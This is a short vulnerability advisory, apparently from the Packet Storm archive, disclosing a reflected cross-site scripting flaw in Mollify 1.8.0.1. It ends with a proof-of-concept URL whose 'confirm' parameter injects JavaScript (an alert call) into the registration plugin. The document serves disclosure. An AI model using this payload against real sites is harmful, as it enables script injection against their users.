Mollify 1.8.0.1 Cross Site Scripting

2011-05-24T00:00:00
ID PACKETSTORM:101672
Type packetstorm
Reporter AutoSec Tools
Modified 2011-05-24T00:00:00

Description

                                        
                                            `------------------------------------------------------------------------  
Software................Mollify 1.8.0.1  
Vulnerability...........Reflected Cross-site Scripting  
Threat Level............Low (1/5)  
Download................http://www.mollify.org/  
Discovery Date..........5/19/2011  
Tested On...............Windows Vista + XAMPP  
------------------------------------------------------------------------  
Author..................AutoSec Tools  
Site....................http://www.autosectools.com/  
Email...................John Leitch <john@autosectools.com>  
------------------------------------------------------------------------  
  
  
--Description--  
  
A reflected cross-site scripting vulnerability in Mollify 1.8.0.1 can  
be exploited to execute arbitrary JavaScript.  
  
  
--PoC--  
  
http://localhost/mollify/backend/plugin/Registration/index.php?confirm=%27%29;alert%280%29;//  
`